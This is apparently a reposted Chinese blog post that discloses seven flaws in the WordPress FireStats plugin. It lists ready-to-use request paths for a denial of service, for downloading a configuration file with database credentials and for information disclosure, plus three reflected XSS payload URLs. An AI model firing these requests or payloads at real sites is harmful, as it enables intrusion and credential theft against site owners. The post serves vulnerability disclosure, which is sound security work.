firestats插件引起的wordpress安全漏洞
我试图找出firestats插件的安全漏洞,结果发现了存在7个安全问题:1x DoS:
/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1
1x 远程下载配置文件,这可能包含数据库的信息 (用户名,密码,姓名,前缀,主机)
/wp-content/plugins/firestats/php/tools/get_config.php
2x Information disclosue:
/wp-content/plugins/firestats/php/page-sites.php /wp-content/plugins/firestats/php/page-tools.php
3x XSS:
/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E /wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E /wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=
希望插件团队尽快修复,因为我们有很多人正在使用这个插件,以前的修复程序很快就会出来所以我相信这次也一样会很快出现!
ps:http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html
声明: 本文采用 BY-NC-SA 协议进行授权. 转载请注明转自: firestats插件引起的wordpress安全漏洞
0评论
0Trackbacks
发表评论
Trackback
